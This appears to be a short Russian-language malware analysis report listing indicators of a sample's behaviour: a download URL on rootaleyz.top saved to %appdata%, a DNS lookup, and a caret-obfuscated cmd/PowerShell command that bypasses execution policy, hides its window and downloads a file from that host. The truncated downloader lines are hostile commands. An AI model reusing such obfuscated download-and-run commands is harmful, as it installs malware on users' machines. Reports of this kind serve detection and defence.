Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^W^Er^SHel^l.^eXe ^-Ex^Ecut^IoNpO^lICy^ bYPA^ss^ -NOp^rOf^I^l^E^ -^W^inDO^wsTYLe^ hiD^Den^ (n^Ew-o^bJ^e^ct ^SySteM.^net.WEb^Cl^ie^N^t^).down^loa^D^f^i^le^('http://rootaleyz....
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "Po^W^Er^SHel^l.^eXe ^-Ex^Ecut^IoNpO^lICy^ bYPA^ss^ -NOp^rOf^I^l^E^ -^W^inDO^wsTYLe^ hiD^Den^ (n^Ew-o^bJ^e^ct ^SySteM.^net.WEb^Cl^ie^N^t^).down^loa^D^f^i^le^('http://rootaleyz....' (со скрытым окном)